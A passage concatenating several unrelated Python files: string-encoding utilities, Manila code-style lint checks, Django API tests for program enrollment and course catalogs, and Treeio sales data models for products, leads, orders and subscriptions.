        return text.decode(incoming, errors)
    except UnicodeDecodeError:
        # Note(flaper87) If we get here, it means that
        # sys.stdin.encoding / sys.getdefaultencoding
        # didn't return a suitable encoding to decode
        # text. This happens mostly when global LANG
        # var is not set correctly and there's no
        # default encoding. In this case, most likely
        # python will use ASCII or ANSI encoders as
        # default encodings but they won't be capable
        # of decoding non-ASCII characters.
        #
        # Also, UTF-8 is being used since it's an ASCII
        # extension.
        return text.decode('utf-8', errors)
def safe_encode(text, incoming=None,
                encoding='utf-8', errors='strict'):
    """Encodes incoming str/unicode using `encoding`.

    If incoming is not specified, text is expected to be encoded with
    current python's default encoding. (`sys.getdefaultencoding`)

    :param incoming: Text's current encoding
    :param encoding: Expected encoding for text (Default UTF-8)
    :param errors: Errors handling policy. See here for valid
        values http://docs.python.org/2/library/codecs.html
    :returns: text or a bytestring `encoding` encoded
                representation of it.
    :raises TypeError: If text is not an instance of str
    """
    if not isinstance(text, six.string_types):
        raise TypeError("%s can't be encoded" % type(text))

    if not incoming:
        incoming = (sys.stdin.encoding or
                    sys.getdefaultencoding())

    if isinstance(text, six.text_type):
        if six.PY3:
            # NOTE(review): encoding then decoding with `incoming` on PY3
            # returns a str, not bytes -- this mirrors the upstream oslo
            # behavior of the time; confirm before relying on the return
            # type across Python versions.
            return text.encode(encoding, errors).decode(incoming)
        else:
            return text.encode(encoding, errors)
    elif text and encoding != incoming:
        # Decode text before encoding it with `encoding`
        text = safe_decode(text, incoming, errors)
        if six.PY3:
            return text.encode(encoding, errors).decode(incoming)
        else:
            return text.encode(encoding, errors)

    return text
def to_bytes(text, default=0):
    """Converts a string into an integer of bytes.

    Looks at the last characters of the text to determine
    what conversion is needed to turn the input text into a byte number.
    Supports "B, K(B), M(B), G(B), and T(B)". (case insensitive)

    :param text: String input for bytes size conversion.
    :param default: Default return value when text is blank.
    """
    match = BYTE_REGEX.search(text)
    if not match:
        # Non-empty text with no leading integer is malformed.
        if text:
            msg = _('Invalid string format: %s') % text
            raise TypeError(msg)
        return default

    magnitude = int(match.group(1))
    mult_key_org = match.group(2)
    if not mult_key_org:
        return magnitude

    # Normalize 'KB' -> 'k', 'b' -> '', etc. before the table lookup.
    mult_key = mult_key_org.lower().replace('b', '', 1)
    multiplier = BYTE_MULTIPLIERS.get(mult_key)
    if multiplier is None:
        msg = _('Unknown byte multiplier: %s') % mult_key_org
        raise TypeError(msg)
    return magnitude * multiplier
def to_slug(value, incoming=None, errors="strict"):
    """Normalize string.

    Convert to lowercase, remove non-word characters, and convert spaces
    to hyphens.

    Inspired by Django's `slugify` filter.

    :param value: Text to slugify
    :param incoming: Text's current encoding
    :param errors: Errors handling policy. See here for valid
        values http://docs.python.org/2/library/codecs.html
    :returns: slugified unicode representation of `value`
    :raises TypeError: If text is not an instance of str
    """
    decoded = safe_decode(value, incoming, errors)
    # NOTE(aababilov): no need to use safe_(encode|decode) here:
    # encodings are always "ascii", error handling is always "ignore"
    # and types are always known (first: unicode; second: str)
    ascii_text = unicodedata.normalize("NFKD", decoded).encode(
        "ascii", "ignore").decode("ascii")
    stripped = SLUGIFY_STRIP_RE.sub("", ascii_text).strip().lower()
    return SLUGIFY_HYPHENATE_RE.sub("-", stripped)
|
|
# Copyright (c) 2012, Cloudscaling
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import re
import pep8
"""
Guidelines for writing new hacking checks
- Use only for Manila specific tests. OpenStack general tests
should be submitted to the common 'hacking' module.
- Pick numbers in the range M3xx. Find the current test with
the highest allocated number and then pick the next value.
- Keep the test method code in the source file ordered based
on the M3xx value.
- List the new rule in the top level HACKING.rst file
- Add test cases for each new rule to manila/tests/test_hacking.py
"""
# Mutable module state: filenames already known to import the _ function
# (filled in by check_explicit_underscore_import).
UNDERSCORE_IMPORT_FILES = []

# Matches LOG calls with an untranslated (plain string) first argument.
log_translation = re.compile(
    r"(.)*LOG\.(audit|error|info|critical|exception)\(\s*('|\")")
# Per-level patterns: match LOG calls that use either the generic _()
# marker or a plain string (i.e. not the level-specific _Lx marker).
log_translation_LC = re.compile(
    r"(.)*LOG\.(critical)\(\s*(_\(|'|\")")
log_translation_LE = re.compile(
    r"(.)*LOG\.(error|exception)\(\s*(_\(|'|\")")
log_translation_LI = re.compile(
    r"(.)*LOG\.(info)\(\s*(_\(|'|\")")
log_translation_LW = re.compile(
    r"(.)*LOG\.(warning|warn)\(\s*(_\(|'|\")")
# Matches LOG calls whose message IS wrapped in _( ... ).
translated_log = re.compile(
    r"(.)*LOG\.(audit|error|info|warn|warning|critical|exception)"
    "\(\s*_\(\s*('|\")")
# Matches any use of the _() translation function on a string literal.
string_translation = re.compile(r"[^_]*_\(\s*('|\")")
# Matches an import of a name ending in _ (e.g. `from x import _`).
underscore_import_check = re.compile(r"(.)*import _(.)*")
# We need this for cases where they have created their own _ function.
custom_underscore_check = re.compile(r"(.)*_\s*=\s*(.)*")
# Matches deprecated `from oslo.xxx` namespace imports.
oslo_namespace_imports = re.compile(r"from[\s]*oslo[.](.*)")
# Matches dict() called on a literal sequence of key-value pairs.
dict_constructor_with_list_copy_re = re.compile(r".*\bdict\((\[)?(\(|\[)")
class BaseASTChecker(ast.NodeVisitor):
    """Provides a simple framework for writing AST-based checks.

    Subclasses should implement visit_* methods like any other AST visitor
    implementation. When they detect an error for a particular node the
    method should call ``self.add_error(offending_node)``. Details about
    where in the code the error occurred will be pulled from the node
    object.

    Subclasses should also provide a class variable named CHECK_DESC to
    be used for the human readable error message.
    """

    CHECK_DESC = 'No check message specified'

    def __init__(self, tree, filename):
        """This object is created automatically by pep8.

        :param tree: an AST tree
        :param filename: name of the file being analyzed
                         (ignored by our checks)
        """
        self._tree = tree
        self._errors = []

    def run(self):
        """Called automatically by pep8."""
        self.visit(self._tree)
        return self._errors

    def add_error(self, node, message=None):
        """Add an error caused by a node to the list of errors for pep8."""
        self._errors.append(
            (node.lineno, node.col_offset,
             message or self.CHECK_DESC, self.__class__))

    def _check_call_names(self, call_node, names):
        # True iff the node is a plain-name call to one of `names`.
        return (isinstance(call_node, ast.Call)
                and isinstance(call_node.func, ast.Name)
                and call_node.func.id in names)
def no_translate_debug_logs(logical_line, filename):
    """Check for 'LOG.debug(_('

    As per our translation policy,
    https://wiki.openstack.org/wiki/LoggingStandards#Log_Translation
    we shouldn't translate debug level logs.

    * This check assumes that 'LOG' is a logger.
    * Use filename so we can start enforcing this in specific folders instead
      of needing to do so all at once.

    M319
    """
    marker = "LOG.debug(_("
    if logical_line[:len(marker)] == marker:
        yield (0, "M319 Don't translate debug level logs")
def validate_log_translations(logical_line, physical_line, filename):
    """Enforce per-level log translation markers. M327-M331."""
    # Translations are not required in the test and tempest
    # directories.
    if ("manila/tests" in filename or "manila_tempest_tests" in filename or
            "contrib/tempest" in filename):
        return
    if pep8.noqa(physical_line):
        return
    # Each rule pairs a pattern with its message; evaluated in order so
    # the emitted diagnostics match the historical ordering.
    rules = (
        (log_translation_LC,
         "M327: LOG.critical messages require translations `_LC()`!"),
        (log_translation_LE,
         "M328: LOG.error and LOG.exception messages require translations "
         "`_LE()`!"),
        (log_translation_LI,
         "M329: LOG.info messages require translations `_LI()`!"),
        (log_translation_LW,
         "M330: LOG.warning messages require translations `_LW()`!"),
        (log_translation,
         "M331: Log messages require translations!"),
    )
    for pattern, msg in rules:
        if pattern.match(logical_line):
            yield (0, msg)
def check_explicit_underscore_import(logical_line, filename):
    """Check for explicit import of the _ function

    We need to ensure that any files that are using the _() function
    to translate logs are explicitly importing the _ function.  We
    can't trust unit test to catch whether the import has been
    added so we need to check for it here.
    """
    # Files already known to import _ need no further checking.
    if filename in UNDERSCORE_IMPORT_FILES:
        return
    if (underscore_import_check.match(logical_line) or
            custom_underscore_check.match(logical_line)):
        # Remember this file; later lines in it are exempt.
        UNDERSCORE_IMPORT_FILES.append(filename)
    elif (translated_log.match(logical_line) or
          string_translation.match(logical_line)):
        yield (0, "M323: Found use of _() without explicit import of _ !")
class CheckForStrExc(BaseASTChecker):
    """Checks for the use of str() on an exception.

    This currently only handles the case where str() is used in
    the scope of an exception handler. If the exception is passed
    into a function, returned from an assertRaises, or used on an
    exception created in the same scope, this does not catch it.
    """

    CHECK_DESC = ('M325 str() cannot be used on an exception. '
                  'Remove or use six.text_type()')

    def __init__(self, tree, filename):
        super(CheckForStrExc, self).__init__(tree, filename)
        # Stack of exception-handler variable names currently in scope.
        self.name = []
        # Call nodes already reported, to avoid duplicate errors.
        self.already_checked = []

    # NOTE(review): ast.TryExcept (and handler.name being a Name node)
    # only exists on Python 2; on Python 3 the node is ast.Try and
    # handler.name is a plain string -- this visitor assumes Python 2.
    def visit_TryExcept(self, node):
        for handler in node.handlers:
            if handler.name:
                # Track the bound exception name only while visiting the
                # handler's subtree, then pop it.
                self.name.append(handler.name.id)
                super(CheckForStrExc, self).generic_visit(node)
                self.name = self.name[:-1]
            else:
                super(CheckForStrExc, self).generic_visit(node)

    def visit_Call(self, node):
        # Flag str(<exc>) where <exc> is a tracked handler variable.
        if self._check_call_names(node, ['str']):
            if node not in self.already_checked:
                self.already_checked.append(node)
                if isinstance(node.args[0], ast.Name):
                    if node.args[0].id in self.name:
                        self.add_error(node.args[0])
        super(CheckForStrExc, self).generic_visit(node)
class CheckForTransAdd(BaseASTChecker):
    """Checks for the use of concatenation on a translated string.

    Translations should not be concatenated with other strings, but
    should instead include the string being added to the translated
    string to give the translators the most information.
    """

    CHECK_DESC = ('M326 Translated messages cannot be concatenated. '
                  'String should be included in translated message.')

    TRANS_FUNC = ['_', '_LI', '_LW', '_LE', '_LC']

    def visit_BinOp(self, node):
        # Only '+' expressions can concatenate; report the first operand
        # that is a direct call to a translation function.
        if isinstance(node.op, ast.Add):
            for operand in (node.left, node.right):
                if self._check_call_names(operand, self.TRANS_FUNC):
                    self.add_error(operand)
                    break
        super(CheckForTransAdd, self).generic_visit(node)
def check_oslo_namespace_imports(logical_line, physical_line, filename):
    """Forbid imports from the deprecated `oslo.` namespace. M333"""
    if pep8.noqa(physical_line):
        return
    if oslo_namespace_imports.match(logical_line):
        suggestion = logical_line.replace('oslo.', 'oslo_')
        yield (0, ("M333: '%s' must be used instead of '%s'.") % (
            suggestion, logical_line))
def dict_constructor_with_list_copy(logical_line):
    """Flag dict() built from a literal sequence of pairs. M336"""
    if dict_constructor_with_list_copy_re.match(logical_line):
        yield (0, ("M336: Must use a dict comprehension instead of a dict"
                   " constructor with a sequence of key-value pairs."))
def factory(register):
    """Entry point called by pep8/flake8 to register all local checks."""
    register(validate_log_translations)
    register(check_explicit_underscore_import)
    register(no_translate_debug_logs)
    register(CheckForStrExc)
    register(CheckForTransAdd)
    register(check_oslo_namespace_imports)
    register(dict_constructor_with_list_copy)
|
|
"""Tests for the API"""
from unittest.mock import Mock
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from courses.catalog_serializers import CatalogProgramSerializer
from courses.factories import ProgramFactory, CourseFactory, CourseRunFactory
from courses.serializers import ProgramSerializer, CourseRunSerializer
from dashboard.factories import ProgramEnrollmentFactory
from dashboard.models import ProgramEnrollment
from micromasters.factories import UserFactory
from micromasters.test_utils import assert_drf_json_equal
from profiles.models import Profile
from search.base import MockedESTestCase
class ProgramTests(MockedESTestCase):
    """Tests for the Program API"""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = UserFactory.create()

    def setUp(self):
        super().setUp()
        self.client.force_login(self.user)

    def test_lists_live_programs(self):
        """Live programs should show up"""
        program = ProgramFactory.create(live=True)
        resp = self.client.get(reverse('program-list'))
        assert len(resp.json()) == 1
        serialized = ProgramSerializer(
            program, context={"request": Mock(user=self.user)}).data
        assert [serialized] == resp.json()

    def test_doesnt_list_unlive_programs(self):
        """Not-live programs should NOT show up"""
        ProgramFactory.create(live=False)
        resp = self.client.get(reverse('program-list'))
        assert len(resp.json()) == 0
def create_learner_with_image(privacy):
    """Create a user whose profile has the given account_privacy and a small image URL."""
    learner = UserFactory.create()
    profile = learner.profile
    profile.account_privacy = privacy
    profile.image_small = 'some_url'
    profile.save()
    return learner
class ProgramLearnersTests(MockedESTestCase, APITestCase):
    """Tests for the ProgramLearners API"""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.program = ProgramFactory.create(live=True)
        cls.url = reverse('learners_in_program', kwargs={"program_id": cls.program.id})
        cls.user = create_learner_with_image(privacy=Profile.PUBLIC)

    def setUp(self):
        # Bug fix: super().setUp() was never called, so the per-test setup of
        # MockedESTestCase / APITestCase was skipped (every sibling test class
        # in this file calls it).
        super().setUp()
        self.client.force_login(self.user)

    def create_learners_in_program(self, learners_count, privacy=Profile.PUBLIC):
        """Helper: enroll learners_count fresh users (with images) in the program."""
        for _ in range(learners_count):
            user = create_learner_with_image(privacy)
            ProgramEnrollmentFactory.create(
                user=user,
                program=self.program,
            )

    def test_should_get_empty_list_if_only_one_learner(self):
        """
        should return empty list for learners if there are no other enrolled learners
        """
        response = self.client.get(self.url)
        assert response.status_code == status.HTTP_200_OK
        assert response.data['learners_count'] == 0

    def test_should_return_only_eight_users(self):
        """
        should return total number of learners in the program
        and only eight of them in a list
        """
        self.create_learners_in_program(learners_count=10)
        response = self.client.get(self.url)
        assert response.status_code == status.HTTP_200_OK
        assert response.data['learners_count'] == 10
        assert len(response.data['learners']) == 8

    def test_should_return_only_public_users(self):
        """
        should return only profiles that are not private
        """
        self.create_learners_in_program(learners_count=5, privacy=Profile.PRIVATE)
        self.create_learners_in_program(learners_count=5, privacy=Profile.PUBLIC_TO_MM)
        self.create_learners_in_program(learners_count=5)
        response = self.client.get(self.url)
        assert response.status_code == status.HTTP_200_OK
        assert response.data['learners_count'] == 10
class ProgramEnrollmentTests(MockedESTestCase, APITestCase):
    """Tests for the ProgramEnrollment API (POST-only enrollment endpoint)."""
    @classmethod
    def setUpTestData(cls):
        super(ProgramEnrollmentTests, cls).setUpTestData()
        cls.user1 = UserFactory.create()
        cls.user2 = UserFactory.create()
        cls.program1 = ProgramFactory.create(live=True)
        cls.program2 = ProgramFactory.create(live=True)
        cls.program3 = ProgramFactory.create(live=True)
        cls.url = reverse('user_program_enrollments')
    def setUp(self):
        super().setUp()
        # user1 starts enrolled in program1 and program2; program3 stays free
        # for the happy-path creation test.
        self.default_enrollments = [
            ProgramEnrollmentFactory(
                user=self.user1,
                program=program,
            ) for program in (self.program1, self.program2,)
        ]
        self.client.force_login(self.user1)
    def tearDown(self):
        super().tearDown()
        ProgramEnrollment.objects.all().delete()
    def assert_program_enrollments_count(self, expected_count=None):
        """Assert (and return) the total enrollment count.

        Defaults to the number of enrollments created in setUp, so a bare
        call asserts that nothing changed.
        """
        if expected_count is None:
            expected_count = len(self.default_enrollments)
        count = ProgramEnrollment.objects.count()
        assert count == expected_count
        return count
    def test_anonymous(self):
        """Anonymous user cannot access the endpoint"""
        self.client.logout()
        resp = self.client.post(self.url)
        assert resp.status_code == status.HTTP_403_FORBIDDEN
    def test_no_enrollments(self):
        """GET is rejected with 405 even for a user with no enrollments (POST-only endpoint)"""
        self.client.logout()
        self.client.force_login(self.user2)
        resp = self.client.get(self.url)
        assert resp.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
    def test_no_get_for_enrollments(self):
        """GET is not allowed for /api/v0/enrolledprograms/"""
        resp = self.client.get(self.url)
        assert resp.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
    def test_create_no_program_id(self):
        """Missing mandatory program_id parameter"""
        self.assert_program_enrollments_count()
        resp = self.client.post(self.url, {}, format='json')
        self.assert_program_enrollments_count()
        assert resp.status_code == status.HTTP_400_BAD_REQUEST
    def test_create_invalid_program_id(self):
        """program_id parameter must be an integer"""
        self.assert_program_enrollments_count()
        resp = self.client.post(self.url, {'program_id': 'foo'}, format='json')
        self.assert_program_enrollments_count()
        assert resp.status_code == status.HTTP_400_BAD_REQUEST
    def test_create_enrollment_exists(self):
        """Test in case the enrollment is already there"""
        self.assert_program_enrollments_count()
        resp = self.client.post(self.url, {'program_id': self.program1.pk}, format='json')
        self.assert_program_enrollments_count()
        # Re-enrolling is idempotent: 200 rather than 201, no new row.
        assert resp.status_code == status.HTTP_200_OK
        self.assert_program_enrollments_count()
    def test_create_program_does_not_exists(self):
        """Test in case the program does not exist"""
        self.assert_program_enrollments_count()
        resp = self.client.post(self.url, {'program_id': 1234567}, format='json')
        self.assert_program_enrollments_count()
        assert resp.status_code == status.HTTP_404_NOT_FOUND
    def test_create_program_not_live(self):
        """Test in case the program is not live"""
        program = ProgramFactory.create(live=False)
        self.assert_program_enrollments_count()
        resp = self.client.post(self.url, {'program_id': program.pk}, format='json')
        self.assert_program_enrollments_count()
        assert resp.status_code == status.HTTP_404_NOT_FOUND
    def test_create(self):
        """Test for happy path"""
        count_before = self.assert_program_enrollments_count()
        resp = self.client.post(self.url, {'program_id': self.program3.pk}, format='json')
        self.assert_program_enrollments_count(count_before+1)
        assert resp.status_code == status.HTTP_201_CREATED
        # NOTE(review): the response 'id' is compared to the *program* pk --
        # presumably the serializer exposes the program id, not the
        # enrollment id; confirm against the ProgramEnrollment serializer.
        assert resp.data.get('id') == self.program3.pk
class CourseRunTests(MockedESTestCase, APITestCase):
    """Tests for CourseRun API"""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = UserFactory.create()

    def setUp(self):
        super().setUp()
        self.client.force_login(self.user)

    def test_lists_course_runs(self):
        """Course Runs should show up"""
        run = CourseRunFactory.create()
        response = self.client.get(reverse('courserun-list'))
        assert len(response.json()) == 1
        serializer_context = {"request": Mock(user=self.user)}
        expected = CourseRunSerializer(run, context=serializer_context).data
        assert [expected] == response.json()
class CatalogTests(MockedESTestCase, APITestCase):
    """Tests for catalog API"""

    def test_lists_catalog(self):
        """The catalog lists the live program, including all its course runs"""
        program = ProgramFactory.create(live=True)
        courses = CourseFactory.create_batch(3, program=program)
        for course in courses:
            CourseRunFactory.create_batch(2, course=course)
        response = self.client.get(reverse('catalog-list'))
        assert len(response.json()) == 1
        expected = CatalogProgramSerializer(program).data
        assert_drf_json_equal([expected], response.json())
|
|
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Sales module objects.
"""
from django.core.urlresolvers import reverse
from django.db import models
from treeio.core.models import Object, User, ModuleSetting
from treeio.identities.models import Contact
from treeio.finance.models import Transaction, Currency, Tax
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from decimal import Decimal, ROUND_UP
from time import time as ttime
class SaleStatus(Object):
    """Workflow status of a sale (shared with leads and opportunities)."""
    name = models.CharField(max_length=512)
    # Which pipeline stages may use this status
    use_leads = models.BooleanField(default=False)
    use_opportunities = models.BooleanField(default=False)
    use_sales = models.BooleanField(default=False)
    # Active statuses sort first, hidden ones last (see Meta.ordering)
    active = models.BooleanField(default=False)
    hidden = models.BooleanField(default=False)
    details = models.TextField(blank=True, null=True)
    # presumably excludes this model from the search index -- confirm in core.Object
    searchable = False
    def __unicode__(self):
        return unicode(self.name)
    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_status_view', args=[self.id])
        except Exception:
            return ""
    class Meta:
        "SalesStatus"
        ordering = ('hidden', '-active', 'name')
class Product(Object):
    """A single sellable item: a good, service, subscription or compound."""
    PRODUCT_TYPES = (
        ('service', 'Service'),
        ('good', 'Good'),
        ('subscription', 'Subscription'),
        ('compound', 'Compound'),
    )
    # What to do when stock runs out
    ACTION_CHOICES = (
        ('inactive', 'Mark Inactive'),
        ('notify', 'Notify'),
        ('ignore', 'Ignore'),
    )
    name = models.CharField(max_length=512)
    product_type = models.CharField(max_length=32, default='good',
                                    choices=PRODUCT_TYPES)
    # Parent product for compound products
    parent = models.ForeignKey('self', blank=True, null=True,
                               related_name='child_set')
    code = models.CharField(max_length=512, blank=True, null=True)
    supplier = models.ForeignKey(Contact, blank=True, null=True,
                                 on_delete=models.SET_NULL)
    supplier_code = models.IntegerField(blank=True, null=True)
    buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
    sell_price = models.DecimalField(
        max_digits=20, decimal_places=2, default=0)
    stock_quantity = models.IntegerField(blank=True, null=True)
    active = models.BooleanField(default=False)
    runout_action = models.CharField(max_length=32, blank=True, null=True,
                                     choices=ACTION_CHOICES)
    details = models.TextField(blank=True, null=True)
    access_inherit = ('parent', '*module', '*user')

    def __unicode__(self):
        return unicode(self.name)

    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_product_view', args=[self.id])
        except Exception:
            # Bug fix: was a bare 'except:', which also swallowed SystemExit
            # and KeyboardInterrupt; 'except Exception' matches the sibling
            # models in this module.
            return ""

    class Meta:
        "Product"
        ordering = ['code']
class SaleSource(Object):
    "Source of Sale e.g. Search Engine"
    name = models.CharField(max_length=512)
    active = models.BooleanField(default=False)
    details = models.TextField(blank=True, null=True)
    # presumably excludes this model from the search index -- confirm in core.Object
    searchable = False
    def __unicode__(self):
        return unicode(self.name)
    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_source_view', args=[self.id])
        except Exception:
            return ""
    class Meta:
        # Active sources first, then alphabetical
        ordering = ('-active', 'name')
class Lead(Object):
    "Lead"
    # Preferred way of contacting this lead
    CONTACT_METHODS = (
        ('email', 'E-Mail'),
        ('phone', 'Phone'),
        ('post', 'Post'),
        ('face', 'Face to Face')
    )
    contact = models.ForeignKey(Contact)
    source = models.ForeignKey(
        SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
    products_interested = models.ManyToManyField(
        Product, blank=True, null=True)
    contact_method = models.CharField(max_length=32, choices=CONTACT_METHODS)
    assigned = models.ManyToManyField(User, related_name='sales_lead_assigned',
                                      blank=True, null=True)
    status = models.ForeignKey(SaleStatus)
    details = models.TextField(blank=True, null=True)
    # presumably the access-control inheritance chain -- confirm in core.Object
    access_inherit = ('contact', '*module', '*user')
    def __unicode__(self):
        return unicode(self.contact.name)
    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_lead_view', args=[self.id])
        except Exception:
            return ""
    class Meta:
        "Lead"
        ordering = ['contact']
class Opportunity(Object):
    "Opportunity"
    lead = models.ForeignKey(
        Lead, blank=True, null=True, on_delete=models.SET_NULL)
    contact = models.ForeignKey(Contact)
    products_interested = models.ManyToManyField(Product)
    source = models.ForeignKey(
        SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
    expected_date = models.DateField(blank=True, null=True)
    closed_date = models.DateField(blank=True, null=True)
    assigned = models.ManyToManyField(
        User, related_name='sales_opportunity_assigned', blank=True, null=True)
    status = models.ForeignKey(SaleStatus)
    # Win probability as a whole-number percentage (3 digits, 0 decimals)
    probability = models.DecimalField(
        max_digits=3, decimal_places=0, blank=True, null=True)
    # amount is denominated in amount_currency; amount_display is the
    # converted figure -- presumably in the system display currency, confirm
    # against the finance module.
    amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
    amount_currency = models.ForeignKey(Currency)
    amount_display = models.DecimalField(
        max_digits=20, decimal_places=2, default=0)
    details = models.TextField(blank=True, null=True)
    access_inherit = ('lead', 'contact', '*module', '*user')
    def __unicode__(self):
        return unicode(self.contact)
    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_opportunity_view', args=[self.id])
        except Exception:
            return ""
    class Meta:
        "Opportunity"
        ordering = ['-expected_date']
class SaleOrder(Object):
    """A client's confirmed order: line items, payments, taxes and totals."""
    reference = models.CharField(max_length=512, blank=True, null=True)
    datetime = models.DateTimeField(default=datetime.now)
    client = models.ForeignKey(
        Contact, blank=True, null=True, on_delete=models.SET_NULL)
    opportunity = models.ForeignKey(
        Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
    payment = models.ManyToManyField(Transaction, blank=True, null=True)
    source = models.ForeignKey(SaleSource)
    assigned = models.ManyToManyField(
        User, related_name='sales_saleorder_assigned', blank=True, null=True)
    status = models.ForeignKey(SaleStatus)
    currency = models.ForeignKey(Currency)
    # Cached totals (order currency / display currency), refreshed by
    # get_total() and get_total_display()
    total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
    total_display = models.DecimalField(
        max_digits=20, decimal_places=2, default=0)
    details = models.TextField(blank=True, null=True)
    access_inherit = ('opportunity', 'client', '*module', '*user')

    def fulfil(self):
        "Fulfil: decrement stock for each unfulfilled item, renew subscriptions"
        for p in self.orderedproduct_set.all():
            if not p.fulfilled:
                product = p.product
                product.stock_quantity -= p.quantity
                product.save()
                p.fulfilled = True
                p.save()
                if p.subscription:
                    p.subscription.renew()

    def get_next_reference(self):
        "Next human-readable order reference (best effort, not unique)"
        try:
            # Very dirty hack, but kinda works for reference (i.e. it doesn't
            # have to be unique)
            next_ref = SaleOrder.objects.all().aggregate(
                models.Max('id'))['id__max'] + 1
        except Exception:
            # Bug fix: was a bare 'except:'.  This path fires when there are
            # no orders yet: the Max aggregate is None and None + 1 raises
            # TypeError.
            next_ref = 1
        full_ref = '%.5d/%s' % (next_ref, str(str(ttime() * 10)[8:-2]))
        return full_ref

    def save(self, *args, **kwargs):
        "Save, then auto-fulfil when the status matches the configured one"
        super(SaleOrder, self).save(*args, **kwargs)
        try:
            conf = ModuleSetting.get_for_module(
                'treeio.sales', 'order_fulfil_status')[0]
            fulfil_status = long(conf.value)
            if self.status.id == fulfil_status:
                self.fulfil()
        except Exception:
            # Best effort: a missing or malformed setting just skips fulfilment
            pass

    def __unicode__(self):
        return unicode(self.reference)

    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_order_view', args=[self.id])
        except Exception:
            return ""

    def get_taxes(self, base=False):
        """Per-tax totals over non-trashed taxed items.

        Returns {tax_id: {'name', 'rate', 'amount'}}.  Amounts use the base
        currency when base=True, otherwise the display currency.
        """
        # TODO: Compound taxes
        taxes = {}
        ops = self.orderedproduct_set.filter(
            trash=False).filter(tax__isnull=False)
        for p in ops:
            if base:
                item_total = p.get_total()
            else:
                item_total = p.get_total_display()
            if p.tax.id in taxes:
                taxes[p.tax.id]['amount'] += (item_total * (p.tax.rate / 100)).quantize(Decimal('.01'),
                                                                                        rounding=ROUND_UP)
            else:
                taxes[p.tax.id] = {'name': p.tax.name, 'rate': p.tax.rate,
                                   'amount': (item_total * (p.tax.rate / 100))
                                   .quantize(Decimal('.01'), rounding=ROUND_UP)}
        return taxes

    def get_taxes_total(self):
        "Sum of all tax amounts for this order"
        total = 0
        for tax in self.get_taxes().values():
            total += tax['amount']
        return total

    def get_subtotal(self):
        "Item total excluding tax; also caches the value on self.total"
        # 'subtotal' instead of the original 'sum', which shadowed the builtin
        subtotal = 0
        for p in self.orderedproduct_set.filter(trash=False):
            subtotal += p.get_total()
        self.total = subtotal
        return subtotal

    def get_subtotal_display(self):
        "Display-currency item total excluding tax; caches self.total_display"
        subtotal = 0
        for p in self.orderedproduct_set.filter(trash=False):
            subtotal += p.get_total_display()
        self.total_display = subtotal
        return subtotal

    def get_total(self):
        "Item total including tax; also caches the value on self.total"
        order_total = 0
        for p in self.orderedproduct_set.filter(trash=False):
            order_total += p.get_total()
        order_total += self.get_taxes_total()
        self.total = order_total
        return order_total

    def get_total_display(self):
        "Display-currency total including tax; caches self.total_display"
        order_total = 0
        for p in self.orderedproduct_set.filter(trash=False):
            order_total += p.get_total_display()
        order_total += self.get_taxes_total()
        self.total_display = order_total
        return order_total

    def update_total(self):
        "Recompute both cached totals and persist them"
        self.get_total()
        self.get_total_display()
        self.save()

    def get_total_paid(self):
        "Sum of non-trashed payments recorded against this order"
        return Decimal(
            self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')

    def balance_due(self):
        "Outstanding amount: full total minus payments received"
        return self.get_total() - self.get_total_paid()

    class Meta:
        "SaleOrder"
        ordering = ['-datetime']
class Subscription(Object):
    """A recurring sale: a product billed to a client once per billing cycle."""
    CYCLE_PERIODS = (
        ('daily', 'Daily'),
        ('weekly', 'Weekly'),
        ('monthly', 'Monthly'),
        ('quarterly', 'Quarterly'),
        ('yearly', 'Yearly')
    )
    client = models.ForeignKey(
        Contact, blank=True, null=True, on_delete=models.SET_NULL)
    product = models.ForeignKey(Product, blank=True, null=True)
    start = models.DateField(default=datetime.now)
    expiry = models.DateField(blank=True, null=True)
    # Bug fix: the default was 'month', which is not one of CYCLE_PERIODS
    cycle_period = models.CharField(max_length=32, choices=CYCLE_PERIODS, default='monthly')
    cycle_end = models.DateField(blank=True, null=True)
    active = models.BooleanField(default=False)
    details = models.CharField(max_length=512, blank=True, null=True)
    access_inherit = ('client', 'product', '*module', '*user')

    def _cycle_delta(self):
        "One billing cycle as a date offset; unknown periods fall back to monthly"
        if self.cycle_period == 'daily':
            return timedelta(days=1)
        elif self.cycle_period == 'weekly':
            return timedelta(weeks=1)
        elif self.cycle_period == 'quarterly':
            # Bug fix: was relativedelta(months=+4) -- a quarter is 3 months
            return relativedelta(months=+3)
        elif self.cycle_period == 'yearly':
            return relativedelta(years=1)
        return relativedelta(months=+1)

    def get_cycle_start(self):
        "Get the cycle start date (None until the first renewal sets cycle_end)"
        if not self.cycle_end:
            return None
        return self.cycle_end - self._cycle_delta()

    def renew(self):
        "Renew: push cycle_end one full cycle ahead of today"
